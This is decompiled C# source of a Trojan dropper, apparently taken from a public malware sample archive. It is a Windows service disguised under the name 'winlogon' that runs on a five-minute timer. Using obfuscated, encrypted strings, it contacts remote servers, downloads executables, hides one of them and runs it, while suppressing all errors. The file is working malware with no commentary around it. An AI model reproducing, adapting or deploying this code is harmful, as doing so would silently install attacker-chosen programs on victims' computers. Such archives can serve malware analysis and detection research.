MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.famp-6427595611179d5d5dac279b1a45e8419adb3bb7a48e56b0dc2408b6a417bbb5/winlogon/winlogon.cs

217 lines
6.3 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: winlogon.winlogon
// Assembly: winlogon, Version=6.1.7601.17514, Culture=neutral, PublicKeyToken=null
// MVID: AC059A05-C181-4518-A4B8-9A5E8B3420DD
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.famp-6427595611179d5d5dac279b1a45e8419adb3bb7a48e56b0dc2408b6a417bbb5.exe
using K6lba8gkqFKwGTxlJE;
using qpa0K4UP35oevQjLvS;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.ServiceProcess;
using System.Timers;
namespace winlogon
{
public class winlogon : ServiceBase
{
private Stream tIkqidsdd;
private Stream agHpgdkpf;
private string TRGxesqWy;
private System.Timers.Timer J4H86ry38;
private string IpbRXnHtq;
private string ojjvCptCp;
private IContainer Ymki2qQIc;
[MethodImpl(MethodImplOptions.NoInlining)]
public winlogon()
{
r6O22AEB3hooSSmKYs.eqJZdUAzZVtL9();
this.TRGxesqWy = ipbpJ7ihfEneDowwMq.YHW3lrBiD(0);
this.J4H86ry38 = new System.Timers.Timer();
this.IpbRXnHtq = string.Empty;
this.ojjvCptCp = string.Empty;
// ISSUE: explicit constructor call
base.\u002Ector();
this.cpsKDrXGe();
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void c1SU2WrXB()
{
try
{
using (WebClient webClient = new WebClient())
{
this.tIkqidsdd = webClient.OpenRead(ipbpJ7ihfEneDowwMq.YHW3lrBiD(42));
this.agHpgdkpf = (Stream) new FileStream(ipbpJ7ihfEneDowwMq.YHW3lrBiD(122), FileMode.Create, FileAccess.Write, FileShare.None);
byte[] buffer = new byte[2048];
int count;
while ((count = this.tIkqidsdd.Read(buffer, 0, buffer.Length)) > 0)
this.agHpgdkpf.Write(buffer, 0, count);
}
this.tIkqidsdd.Close();
this.agHpgdkpf.Close();
}
catch
{
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
private string eqYl4FZqm()
{
try
{
StreamReader streamReader = new StreamReader(WebRequest.Create(ipbpJ7ihfEneDowwMq.YHW3lrBiD(164)).GetResponse().GetResponseStream());
string str1 = string.Empty;
for (string str2 = streamReader.ReadLine(); str2 != null; str2 = streamReader.ReadLine())
{
Console.WriteLine(str2);
if (str2 != null && str2 != string.Empty)
str1 = str2;
}
streamReader.Close();
return str1;
}
catch
{
return ipbpJ7ihfEneDowwMq.YHW3lrBiD(240);
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void egcS2HvT8()
{
try
{
using (WebClient webClient = new WebClient())
{
string address = this.eqYl4FZqm();
if (address != ipbpJ7ihfEneDowwMq.YHW3lrBiD(264))
{
this.tIkqidsdd = webClient.OpenRead(address);
this.agHpgdkpf = (Stream) new FileStream(ipbpJ7ihfEneDowwMq.YHW3lrBiD(288), FileMode.Create, FileAccess.Write, FileShare.None);
byte[] buffer = new byte[2048];
int count;
while ((count = this.tIkqidsdd.Read(buffer, 0, buffer.Length)) > 0)
this.agHpgdkpf.Write(buffer, 0, count);
}
}
this.tIkqidsdd.Close();
this.agHpgdkpf.Close();
if (!System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(332)))
return;
System.IO.File.SetAttributes(ipbpJ7ihfEneDowwMq.YHW3lrBiD(376), FileAttributes.Hidden);
}
catch
{
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void AXlek072B()
{
try
{
if (!System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(420)))
return;
Process.Start(ipbpJ7ihfEneDowwMq.YHW3lrBiD(464));
}
catch
{
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void Fi3kmxHdd()
{
try
{
StreamReader streamReader1 = new StreamReader(WebRequest.Create(ipbpJ7ihfEneDowwMq.YHW3lrBiD(508)).GetResponse().GetResponseStream());
string empty1 = string.Empty;
for (string str = streamReader1.ReadLine(); str != null; str = streamReader1.ReadLine())
{
Console.WriteLine(str);
if (str != null && str != string.Empty)
this.IpbRXnHtq = str;
}
streamReader1.Close();
StreamReader streamReader2 = System.IO.File.OpenText(this.TRGxesqWy);
string empty2 = string.Empty;
for (string str = streamReader2.ReadLine(); str != null; str = streamReader2.ReadLine())
{
Console.WriteLine(str);
if (str != null && str != string.Empty)
this.ojjvCptCp = str;
}
streamReader2.Close();
if (this.IpbRXnHtq != this.ojjvCptCp)
{
this.c1SU2WrXB();
this.egcS2HvT8();
this.AXlek072B();
}
else if (System.IO.File.Exists(ipbpJ7ihfEneDowwMq.YHW3lrBiD(588)))
{
this.AXlek072B();
}
else
{
this.egcS2HvT8();
this.AXlek072B();
}
}
catch
{
this.AXlek072B();
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
protected override void OnStart(string[] args)
{
this.J4H86ry38.Interval = 300000.0;
this.J4H86ry38.Elapsed += new ElapsedEventHandler(this.LPFCHd2BB);
this.J4H86ry38.Start();
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void LPFCHd2BB([In] object obj0, [In] ElapsedEventArgs obj1)
{
this.J4H86ry38.Stop();
if (!System.IO.File.Exists(this.TRGxesqWy))
{
this.c1SU2WrXB();
this.egcS2HvT8();
this.AXlek072B();
}
else
this.Fi3kmxHdd();
}
[MethodImpl(MethodImplOptions.NoInlining)]
protected override void OnStop() => this.J4H86ry38.Stop();
[MethodImpl(MethodImplOptions.NoInlining)]
protected override void Dispose(bool disposing)
{
if (disposing && this.Ymki2qQIc != null)
this.Ymki2qQIc.Dispose();
base.Dispose(disposing);
}
[MethodImpl(MethodImplOptions.NoInlining)]
private void cpsKDrXGe()
{
this.Ymki2qQIc = (IContainer) new Container();
this.ServiceName = ipbpJ7ihfEneDowwMq.YHW3lrBiD(632);
}
}
}